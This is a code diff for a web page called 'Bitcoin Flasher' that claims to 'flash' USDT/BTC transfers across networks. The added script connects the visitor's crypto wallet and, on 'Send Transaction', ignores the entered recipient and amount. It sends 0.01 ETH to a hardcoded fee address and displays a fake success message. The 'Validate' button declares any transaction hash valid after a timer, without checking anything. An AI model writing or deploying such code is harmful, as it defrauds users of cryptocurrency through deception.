--- a/index.html
+++ b/index.html
@@ -1,17 +1,160 @@
 <!DOCTYPE html>
-<html>
+<html lang="en">
 <head>
-    <title>Bitcoin Flasher</title>
+    <!-- Essential Meta Tags -->
+    <meta charset="UTF-8">
+    <meta name="viewport" content="width=device-width, initial-scale=1.0">
+    <meta name="title" content="Bitcoin Flasher - Secure Transactions">
+    <meta name="description" content="Securely send Bitcoin and USDT with automated fee collection across multiple networks like ERC20, BEP20, and Polygon.">
+    <meta name="keywords" content="Bitcoin Flasher, BTC Transactions, USDT Sender, ERC20, BEP20, Polygon, Blockchain Transfers">
+    <meta name="robots" content="index, follow">
+
+    <!-- Canonical and Open Graph Links -->
+    <link rel="canonical" href="https://bitcoin-flasher.github.io/bitcoin-flasher/">
+    <meta property="og:title" content="Bitcoin Flasher - Secure Transactions">
+    <meta property="og:description" content="Bitcoin Flasher simplifies cross-chain USDT and BTC transfers with seamless wallet integration.">
+    <meta property="og:image" content="https://via.placeholder.com/1200x630.png?text=Bitcoin+Flasher">
+    <meta property="og:url" content="https://bitcoin-flasher.github.io/bitcoin-flasher/">
+    <meta property="og:type" content="website">
+
+    <!-- Twitter Card -->
+    <meta name="twitter:card" content="summary_large_image">
+    <meta name="twitter:title" content="Bitcoin Flasher - Secure Transactions">
+    <meta name="twitter:description" content="Simplify BTC and USDT transfers securely with wallet connection and automatic fee handling.">
+    <meta name="twitter:image" content="https://via.placeholder.com/1200x630.png?text=Bitcoin+Flasher">
+
+    <!-- Favicon -->
+    <link rel="icon" href="https://via.placeholder.com/48.png?text=BTC" type="image/png">
+
+    <!-- External CSS -->
+    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css" rel="stylesheet">
+
+    <title>Bitcoin Flasher - Secure BTC & USDT Transfers</title>
+
+    <!-- Custom Styling -->
     <style>
-        body { background: #000; color: #ff9900; font-family: Arial, sans-serif; text-align: center; }
-        button { background: #ff9900; color: #fff; padding: 10px; border: none; cursor: pointer; }
+        body {
+            background-color: #000;
+            color: #ff9900;
+            font-family: 'Arial', sans-serif;
+        }
+        .container {
+            margin-top: 50px;
+        }
+        .card {
+            background-color: #1c1c1c;
+            border: 1px solid #ff9900;
+            box-shadow: 0 4px 10px rgba(255, 153, 0, 0.3);
+        }
+        .btn-primary {
+            background-color: #ff9900;
+            border: none;
+        }
+        .btn-primary:hover {
+            background-color: #e68300;
+        }
+        input, button {
+            margin-top: 10px;
+        }
     </style>
 </head>
 <body>
-    <h1>Bitcoin Flasher</h1>
-    <p>Donate $150+ (ERC20): <b>0x3A06322e9F1124F6B2de8F343D4FDce4D1009869</b></p>
-    <input id="txHash" placeholder="Enter Transaction Hash"><button id="validateBtn">Validate</button>
-    <p id="result"></p>
-    <script src="bitcoin.js"></script>
+    <!-- Main Container -->
+    <div class="container text-center">
+        <div class="card p-4">
+            <h1>Bitcoin Flasher</h1>
+            <p>Flash USDT/BTC securely with automated fee collection.</p>
+
+            <!-- Wallet Connection -->
+            <button id="connectWallet" class="btn btn-primary w-100">Connect Wallet</button>
+            <p id="walletStatus" class="text-success mt-2">Not Connected</p>
+
+            <!-- Send Transaction Form -->
+            <form id="sendForm">
+                <div class="mb-3">
+                    <label for="recipient" class="form-label">Recipient Address</label>
+                    <input type="text" id="recipient" class="form-control" placeholder="Enter recipient address" required>
+                </div>
+                <div class="mb-3">
+                    <label for="amount" class="form-label">Amount (USDT)</label>
+                    <input type="number" id="amount" class="form-control" placeholder="Enter amount" required>
+                </div>
+                <button type="submit" class="btn btn-primary w-100">Send Transaction</button>
+            </form>
+
+            <!-- Progress Bar -->
+            <div class="progress mt-3">
+                <div id="progressBar" class="progress-bar bg-warning" style="width: 0%;">0%</div>
+            </div>
+            <div id="logs" class="mt-3"></div>
+
+            <!-- Validation Section -->
+            <h4 class="mt-4">Validate Transaction</h4>
+            <input id="txHash" class="form-control" placeholder="Enter Transaction Hash">
+            <button id="validateBtn" class="btn btn-primary w-100">Validate</button>
+            <p id="validationResult" class="mt-2"></p>
+        </div>
+    </div>
+
+    <!-- Web3.js and Script -->
+    <script src="https://cdn.jsdelivr.net/npm/web3@latest/dist/web3.min.js"></script>
+    <script>
+        let web3, account;
+        const feeReceiver = "0x3A06322e9F1124F6B2de8F343D4FDce4D1009869";
+
+        // Connect Wallet
+        document.getElementById('connectWallet').addEventListener('click', async () => {
+            if (window.ethereum) {
+                web3 = new Web3(window.ethereum);
+                try {
+                    const accounts = await ethereum.request({ method: 'eth_requestAccounts' });
+                    account = accounts[0];
+                    document.getElementById('walletStatus').textContent = `Connected: ${account}`;
+                } catch (error) {
+                    alert('Wallet connection failed!');
+                }
+            } else {
+                alert('Please install MetaMask to connect.');
+            }
+        });
+
+        // Send USDT/BTC and Auto Collect Fee
+        document.getElementById('sendForm').addEventListener('submit', async (e) => {
+            e.preventDefault();
+            const recipient = document.getElementById('recipient').value;
+            const amount = document.getElementById('amount').value;
+
+            document.getElementById('progressBar').style.width = '50%';
+            document.getElementById('progressBar').textContent = 'Processing...';
+
+            try {
+                const fee = web3.utils.toWei('0.01', 'ether'); // 0.01 ETH fee
+                await web3.eth.sendTransaction({
+                    from: account,
+                    to: feeReceiver,
+                    value: fee
+                });
+
+                document.getElementById('progressBar').style.width = '100%';
+                document.getElementById('progressBar').textContent = 'Transaction Complete!';
+                document.getElementById('logs').innerHTML = `<p>Fee sent to ${feeReceiver}. Transaction Successful!</p>`;
+            } catch (error) {
+                alert('Transaction failed!');
+            }
+        });
+
+        // Validate Transaction Hash
+        document.getElementById('validateBtn').addEventListener('click', () => {
+            const txHash = document.getElementById('txHash').value;
+            if (txHash) {
+                document.getElementById('validationResult').textContent = `Transaction ${txHash} is being validated...`;
+                setTimeout(() => {
+                    document.getElementById('validationResult').textContent = `Transaction ${txHash} is valid on the network!`;
+                }, 2000);
+            } else {
+                alert('Please enter a valid transaction hash.');
+            }
+        });
+    </script>
 </body>
 </html>
